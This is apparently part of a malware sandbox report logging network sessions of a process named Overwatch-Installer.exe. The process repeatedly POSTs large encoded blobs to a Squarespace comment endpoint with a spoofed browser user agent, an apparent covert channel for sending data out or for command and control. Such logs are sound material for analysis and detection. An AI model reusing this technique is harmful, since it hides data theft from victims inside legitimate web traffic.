2024-09-01 20:04:16 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:16 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BS25B3v2VxtFNzc2OTE2ZmQzZWZiMzM5MzkyODhjMzM5NmQ1MGVm; Path=/; Secure Set-Cookie: crumb=BdrxFVe4GJasNGMwYmFjN2ZhNzc1NTg0Yzk4MzI2M2M3NWY2MzYz; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: Nv6TWpFA/8njOwGwY Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BdrxFVe4GJasNGMwYmFjN2ZhNzc1NTg0Yzk4MzI2M2M3NWY2MzYz"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49726	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:16 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108898 Expect: 100-continue
2024-09-01 20:04:16 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:16 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:16 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 44 44 5a 57 36 65 74 44 43 6d 54 78 73 41 6a 4d 6f 41 54 63 71 41 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d 54 4c Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9DDZW6etDCmTxsAjMoATcqAgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7MTL
2024-09-01 20:04:16 UTC	1	OUT	Data Raw: 68 Data Ascii: h
2024-09-01 20:04:16 UTC	16306	OUT	Data Raw: 55 39 74 4e 59 65 4e 79 25 32 42 45 4f 4d 6d 67 64 39 51 64 51 6e 57 59 70 51 65 77 4f 75 78 6e 71 44 53 51 4b 7a 6e 6b 69 41 63 6d 38 51 79 74 39 57 6b 4e 49 39 6d 32 6d 6a 43 31 41 47 52 66 61 4c 34 75 35 4f 33 6d 71 48 35 69 61 72 6a 67 37 31 53 72 52 75 62 43 45 6b 76 43 47 61 55 69 5a 32 62 51 72 6c 4c 4b 6e 77 51 32 64 52 34 30 66 36 72 7a 4f 2f 47 39 39 4c 62 33 6f 44 78 6a 4e 43 78 2f 6d 62 73 65 63 33 71 6e 61 34 47 48 6a 64 6d 6f 59 52 6e 4e 30 30 4a 54 43 73 46 31 4e 49 45 75 46 68 64 6a 7a 54 4f 33 6b 38 32 56 65 70 51 35 58 32 74 51 6a 32 76 37 35 50 7a 48 4f 36 36 73 79 67 4f 4f 33 53 2f 6d 52 41 4b 70 25 32 42 74 5a 74 63 63 68 55 25 32 42 30 36 6d 46 76 25 32 42 66 76 41 53 44 57 4e 4e 69 56 53 52 72 58 4c 52 62 4a 6a 79 6d 4e 38 46 54 37 Data Ascii: U9tNYeNy%2BEOMmgd9QdQnWYpQewOuxnqDSQKznkiAcm8Qyt9WkNI9m2mjC1AGRfaL4u5O3mqH5iarjg71SrRubCEkvCGaUiZ2bQrlLKnwQ2dR40f6rzO/G99Lb3oDxjNCx/mbsec3qna4GHjdmoYRnN00JTCsF1NIEuFhdjzTO3k82VepQ5X2tQj2v75PzHO66sygOO3S/mRAKp%2BtZtcchU%2B06mFv%2BfvASDWNNiVSRrXLRbJjymN8FT7
2024-09-01 20:04:16 UTC	1	OUT	Data Raw: 6e Data Ascii: n
2024-09-01 20:04:16 UTC	16306	OUT	Data Raw: 39 70 41 53 73 4b 6f 45 52 5a 4d 64 6e 41 63 43 4d 32 43 2f 31 4b 44 42 58 6c 71 42 70 6d 69 73 63 4c 67 66 6c 47 70 70 5a 56 73 31 67 25 32 42 30 63 39 4b 2f 37 77 35 51 77 44 4c 33 70 59 4d 57 38 57 45 6f 48 2f 65 7a 36 42 31 4f 73 6b 51 37 64 66 35 56 45 48 30 4a 33 77 72 6d 52 61 44 69 25 32 42 56 53 39 66 57 54 33 50 6c 36 67 34 67 78 4b 51 58 6f 39 53 55 34 54 35 44 53 72 5a 47 66 41 4a 6d 58 75 56 4a 39 77 33 79 66 55 62 50 31 76 50 25 32 42 41 47 6f 77 70 48 62 6d 33 54 4f 67 4c 4a 38 35 62 66 56 31 6d 56 64 6e 72 34 57 6f 66 4c 54 47 57 4a 58 37 4e 46 4c 70 56 79 4e 53 4a 79 69 34 77 46 35 7a 54 48 4e 46 4c 47 59 75 58 66 6e 62 6f 6c 43 7a 4a 6e 5a 77 57 6d 35 31 39 6b 31 75 59 75 78 62 39 73 78 44 39 71 53 4a 6b 33 48 4b 25 32 42 49 25 32 42 6d Data Ascii: 9pASsKoERZMdnAcCM2C/1KDBXlqBpmiscLgflGppZVs1g%2B0c9K/7w5QwDL3pYMW8WEoH/ez6B1OskQ7df5VEH0J3wrmRaDi%2BVS9fWT3Pl6g4gxKQXo9SU4T5DSrZGfAJmXuVJ9w3yfUbP1vP%2BAGowpHbm3TOgLJ85bfV1mVdnr4WofLTGWJX7NFLpVyNSJyi4wF5zTHNFLGYuXfnbolCzJnZwWm519k1uYuxb9sxD9qSJk3HK%2BI%2Bm
2024-09-01 20:04:16 UTC	1	OUT	Data Raw: 55 Data Ascii: U
2024-09-01 20:04:16 UTC	16306	OUT	Data Raw: 4e 39 4a 7a 62 75 51 30 74 70 74 73 30 44 74 4e 59 77 6c 48 36 30 55 70 30 32 6d 51 44 77 4d 6e 58 4c 35 30 4e 4f 56 59 77 41 4c 6b 75 57 34 44 61 46 63 5a 6f 61 61 68 4f 45 4e 72 30 44 31 79 45 71 72 32 4d 4a 46 55 25 32 42 51 62 45 5a 78 74 43 4e 35 58 71 25 32 42 74 7a 52 59 61 70 45 7a 4a 37 74 4c 67 59 34 6b 61 71 6b 33 62 33 67 68 6e 6e 43 32 31 66 4e 4b 6c 6a 67 62 4f 4c 65 2f 47 6c 39 47 7a 25 32 42 71 4d 36 70 39 50 52 39 61 4b 25 32 42 78 61 6c 76 37 59 61 31 67 6a 38 46 6f 50 68 79 56 43 37 37 46 44 6b 79 58 65 39 70 72 68 74 4a 33 57 73 78 53 63 6a 37 33 78 37 6d 65 6b 54 58 6e 75 6c 67 37 71 42 61 66 30 6e 34 70 6c 44 41 46 66 6a 48 77 49 59 73 4a 25 32 42 48 4f 79 74 62 4f 50 58 72 55 56 70 38 7a 57 51 49 39 4b 4a 6e 50 68 63 69 4e 39 4c 50 Data Ascii: N9JzbuQ0tpts0DtNYwlH60Up02mQDwMnXL50NOVYwALkuW4DaFcZoaahOENr0D1yEqr2MJFU%2BQbEZxtCN5Xq%2BtzRYapEzJ7tLgY4kaqk3b3ghnnC21fNKljgbOLe/Gl9Gz%2BqM6p9PR9aK%2Bxalv7Ya1gj8FoPhyVC77FDkyXe9prhtJ3WsxScj73x7mekTXnulg7qBaf0n4plDAFfjHwIYsJ%2BHOytbOPXrUVp8zWQI9KJnPhciN9LP
2024-09-01 20:04:16 UTC	1	OUT	Data Raw: 77 Data Ascii: w
2024-09-01 20:04:16 UTC	16306	OUT	Data Raw: 65 31 69 57 51 65 52 41 30 42 61 25 32 42 6d 6a 6d 6d 63 77 39 52 35 6d 4f 53 55 55 70 65 30 66 36 30 57 4b 42 73 6d 75 4e 61 70 65 58 6c 51 5a 75 32 4d 57 6c 4d 6d 38 69 70 42 4e 64 65 58 4b 6d 59 49 43 53 33 4c 54 56 77 76 4a 71 62 6a 30 31 75 4f 25 32 42 4a 42 6d 35 4d 4e 55 59 44 51 77 43 73 61 48 6c 46 41 7a 51 5a 74 45 4d 52 2f 32 42 4e 48 32 42 6d 47 55 51 75 6b 71 57 62 61 6a 32 6c 4f 64 42 57 76 77 34 61 43 6f 67 25 32 42 6c 57 73 31 68 67 7a 4c 4f 56 6a 39 49 7a 49 6e 56 6f 32 35 4d 68 58 6a 58 59 38 38 6b 48 75 42 6f 5a 74 6a 75 39 45 66 66 41 6b 72 5a 52 4a 4e 65 25 32 42 6d 57 41 42 57 4d 56 49 4c 7a 31 62 43 45 34 58 53 68 4e 6f 67 4a 4e 54 4f 74 74 77 6c 51 52 53 63 46 67 44 30 39 61 52 30 6b 41 57 71 39 5a 64 45 41 4c 7a 4c 66 6c 25 32 42 Data Ascii: e1iWQeRA0Ba%2Bmjmmcw9R5mOSUUpe0f60WKBsmuNapeXlQZu2MWlMm8ipBNdeXKmYICS3LTVwvJqbj01uO%2BJBm5MNUYDQwCsaHlFAzQZtEMR/2BNH2BmGUQukqWbaj2lOdBWvw4aCog%2BlWs1hgzLOVj9IzInVo25MhXjXY88kHuBoZtju9EffAkrZRJNe%2BmWABWMVILz1bCE4XShNogJNTOttwlQRScFgD09aR0kAWq9ZdEALzLfl%2B
2024-09-01 20:04:17 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:16 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BVouhuwtZ-mGNGI4NjM2NDhjMGZiNDE5OGQ3YTc5Yzk2OTgwNTVm; Path=/; Secure Set-Cookie: crumb=BfcCR5WfTaOxYmU1MmJmMTYzZjA5ZjRkNjExNWZjZGI0YjRlNWQ4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: pBfQIbrm/yzdf4uRl Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BfcCR5WfTaOxYmU1MmJmMTYzZjA5ZjRkNjExNWZjZGI0YjRlNWQ4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49727	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:19 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:19 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:19 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:19 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:19 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:19 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BayYHKb2n6YeZTRjNzFiN2VlNjUyYmE1ZWYyYmIyMWJhZWU5ZTNj; Path=/; Secure Set-Cookie: crumb=BUAXTRNIAjEhNmY5NGQ3OTM0NWM1YmI1MzllZTA5NTBlMWFjMWZj; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: aRxqHGBh/InHzNA4Z Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BUAXTRNIAjEhNmY5NGQ3OTM0NWM1YmI1MzllZTA5NTBlMWFjMWZj"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49728	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:19 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108468 Expect: 100-continue
2024-09-01 20:04:19 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:19 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:19 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 44 44 5a 57 36 65 74 44 43 6d 51 34 6f 35 62 66 51 6c 47 47 77 41 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d 54 4c Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9DDZW6etDCmQ4o5bfQlGGwAgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7MTL
2024-09-01 20:04:19 UTC	1	OUT	Data Raw: 35 Data Ascii: 5
2024-09-01 20:04:19 UTC	16306	OUT	Data Raw: 25 32 42 66 64 49 73 63 65 6d 35 44 74 6c 56 6c 78 55 4c 67 55 50 75 69 76 66 45 4d 76 75 56 4b 76 79 75 30 70 25 32 42 25 32 42 41 74 48 31 6f 39 67 25 32 42 79 79 4f 62 37 61 63 46 4a 68 30 54 62 47 63 51 74 71 56 4b 53 51 68 78 66 48 66 61 42 34 45 6a 4e 79 57 32 67 56 51 65 6c 54 6e 34 45 56 6b 32 66 4b 59 46 48 2f 65 65 6e 68 58 4e 43 7a 54 44 74 61 41 66 72 33 78 52 64 54 74 4c 67 34 68 6b 68 61 35 6f 5a 45 59 77 4b 53 4d 43 53 66 4b 4a 34 41 32 64 73 42 35 49 33 7a 4e 32 75 79 76 37 39 46 32 56 42 43 37 57 63 47 62 31 36 41 71 44 32 61 30 54 75 2f 6f 6a 6f 6b 71 4f 38 45 42 64 74 36 72 43 30 4d 4c 25 32 42 4c 4b 53 57 5a 71 53 37 31 7a 4a 32 65 52 77 42 71 42 75 6e 79 65 59 4a 67 51 36 67 76 76 70 6c 63 6c 6c 47 33 32 31 58 6c 5a 25 32 42 43 4d 53 Data Ascii: %2BfdIscem5DtlVlxULgUPuivfEMvuVKvyu0p%2B%2BAtH1o9g%2ByyOb7acFJh0TbGcQtqVKSQhxfHfaB4EjNyW2gVQelTn4EVk2fKYFH/eenhXNCzTDtaAfr3xRdTtLg4hkha5oZEYwKSMCSfKJ4A2dsB5I3zN2uyv79F2VBC7WcGb16AqD2a0Tu/ojokqO8EBdt6rC0ML%2BLKSWZqS71zJ2eRwBqBunyeYJgQ6gvvplcllG321XlZ%2BCMS
2024-09-01 20:04:19 UTC	1	OUT	Data Raw: 37 Data Ascii: 7
2024-09-01 20:04:19 UTC	16306	OUT	Data Raw: 48 78 56 72 76 37 70 74 55 6b 33 34 68 35 72 71 6e 42 72 6c 65 78 38 56 61 37 25 32 42 36 62 4e 59 46 73 71 62 73 63 72 64 6f 78 33 30 6d 7a 42 61 34 63 45 4f 46 67 4d 71 4b 55 34 4b 71 76 69 57 53 44 7a 35 36 30 71 50 33 4a 54 66 72 53 67 72 53 65 37 6c 31 6e 61 39 63 4d 45 39 47 67 30 48 34 6f 34 54 31 67 4f 31 25 32 42 54 4e 54 75 25 32 42 76 5a 39 70 25 32 42 67 52 75 47 53 70 53 52 5a 46 59 45 71 6b 73 6f 4e 65 62 46 64 62 4d 73 35 57 50 30 6a 4d 69 64 54 32 72 32 4f 62 2f 50 59 72 73 4c 36 6f 4e 7a 4f 6f 61 75 61 6d 37 41 4d 34 65 49 6c 66 47 61 64 46 69 64 78 4a 70 32 78 4c 4b 42 41 66 4f 41 79 69 67 49 70 62 68 7a 4e 54 44 4a 5a 49 67 7a 36 48 44 56 69 5a 52 77 4b 76 48 32 30 71 46 4f 46 68 35 55 37 6b 25 32 42 56 34 36 45 75 53 6a 4d 74 73 53 72 Data Ascii: HxVrv7ptUk34h5rqnBrlex8Va7%2B6bNYFsqbscrdox30mzBa4cEOFgMqKU4KqviWSDz560qP3JTfrSgrSe7l1na9cME9Gg0H4o4T1gO1%2BTNTu%2BvZ9p%2BgRuGSpSRZFYEqksoNebFdbMs5WP0jMidT2r2Ob/PYrsL6oNzOoauam7AM4eIlfGadFidxJp2xLKBAfOAyigIpbhzNTDJZIgz6HDViZRwKvH20qFOFh5U7k%2BV46EuSjMtsSr
2024-09-01 20:04:19 UTC	1	OUT	Data Raw: 4d Data Ascii: M
2024-09-01 20:04:19 UTC	16306	OUT	Data Raw: 4f 47 38 56 72 54 38 79 44 6b 77 4e 42 59 31 61 34 56 64 4a 65 43 5a 77 32 32 6e 25 32 42 53 4a 74 72 6c 47 72 72 6e 74 53 66 34 6d 4e 4f 55 41 36 65 47 53 38 69 33 6c 49 4c 76 4f 32 6a 38 4a 62 69 69 4e 6b 48 64 4f 6d 79 44 59 43 43 33 6b 6a 71 48 32 57 31 65 6a 57 25 32 42 55 33 50 64 49 77 65 51 6f 64 69 70 44 7a 38 50 59 36 49 47 37 39 4f 69 4b 75 73 51 6b 39 34 6a 5a 74 32 51 6c 79 45 31 33 34 43 71 38 4f 75 47 63 6b 56 47 49 34 78 53 72 39 56 79 6c 53 48 74 34 31 68 64 33 58 6e 61 65 65 4b 38 54 4b 53 77 6e 73 35 6e 50 67 74 38 5a 47 59 38 32 36 68 5a 4a 35 68 49 32 4b 6c 38 66 4f 42 64 7a 31 34 34 77 47 63 69 46 25 32 42 63 46 78 64 39 2f 48 72 55 70 44 49 77 63 2f 61 41 41 6a 56 47 62 38 6e 4b 49 5a 56 77 42 43 31 33 53 46 37 6c 50 74 65 66 45 37 Data Ascii: OG8VrT8yDkwNBY1a4VdJeCZw22n%2BSJtrlGrrntSf4mNOUA6eGS8i3lILvO2j8JbiiNkHdOmyDYCC3kjqH2W1ejW%2BU3PdIweQodipDz8PY6IG79OiKusQk94jZt2QlyE134Cq8OuGckVGI4xSr9VylSHt41hd3XnaeeK8TKSwns5nPgt8ZGY826hZJ5hI2Kl8fOBdz144wGciF%2BcFxd9/HrUpDIwc/aAAjVGb8nKIZVwBC13SF7lPtefE7
2024-09-01 20:04:19 UTC	1	OUT	Data Raw: 36 Data Ascii: 6
2024-09-01 20:04:19 UTC	16306	OUT	Data Raw: 5a 77 47 6b 58 50 77 50 25 32 42 50 70 65 44 34 31 56 74 55 43 39 66 72 6b 2f 48 43 75 54 64 37 4c 39 6f 34 2f 38 73 4b 44 73 59 58 32 59 53 49 77 78 67 57 6c 37 4b 61 70 45 50 4b 4f 6b 4d 4e 57 31 72 79 62 4e 69 4f 62 4e 75 70 72 66 36 25 32 42 65 48 4e 54 4e 32 4e 30 57 61 76 4e 79 48 59 47 68 70 43 33 25 32 42 70 78 50 2f 73 7a 61 64 78 64 66 36 58 4e 47 37 62 44 36 68 35 66 70 6d 63 4c 65 73 4f 6d 63 38 69 6e 6b 53 69 55 71 70 53 47 4a 70 55 36 76 35 77 74 36 45 63 39 75 33 63 7a 63 6a 56 69 34 71 76 71 35 2f 52 72 54 48 57 79 35 31 50 47 53 53 72 46 6f 72 76 41 25 32 42 70 68 49 57 76 41 74 66 6f 39 68 4d 36 6b 49 6a 57 4d 77 70 50 54 6b 54 47 6a 67 4c 47 4c 35 67 2f 61 59 39 4c 4c 6a 35 59 42 71 61 45 56 73 77 63 4e 65 33 48 30 75 64 32 72 57 65 44 Data Ascii: ZwGkXPwP%2BPpeD41VtUC9frk/HCuTd7L9o4/8sKDsYX2YSIwxgWl7KapEPKOkMNW1rybNiObNuprf6%2BeHNTN2N0WavNyHYGhpC3%2BpxP/szadxdf6XNG7bD6h5fpmcLesOmc8inkSiUqpSGJpU6v5wt6Ec9u3czcjVi4qvq5/RrTHWy51PGSSrForvA%2BphIWvAtfo9hM6kIjWMwpPTkTGjgLGL5g/aY9LLj5YBqaEVswcNe3H0ud2rWeD
2024-09-01 20:04:20 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:19 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BQSc3YiTsBkvMjRiODk1ZWFhNTdkZTE1ZTRlMzRlOWY5NjZhN2Nk; Path=/; Secure Set-Cookie: crumb=BXQ9TlVbuQZbMzZmOTkzYjM4OWVkMTkxNjNjMjYwNmMzYTUwMjQ2; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: fHmEiImi/yezwkIEq Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BXQ9TlVbuQZbMzZmOTkzYjM4OWVkMTkxNjNjMjYwNmMzYTUwMjQ2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49729	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:20 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:20 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:20 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:20 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:20 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:20 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BTXsFhYrikdPZmVlMDVhMGQwODkyMjFiMGViZDk1ODdlMjM4MTJj; Path=/; Secure Set-Cookie: crumb=BZCaDXv4WnprMDlhMTZkMzQ4NDgwOGZmYjZkZGM2YmU2ODQ0MjQz; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: AO7yNCLD/CLj8pjyf Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BZCaDXv4WnprMDlhMTZkMzQ4NDgwOGZmYjZkZGM2YmU2ODQ0MjQz"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49730	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:20 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108468 Expect: 100-continue
2024-09-01 20:04:20 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:20 UTC	1	OUT	Data Raw: 70 Data Ascii: p
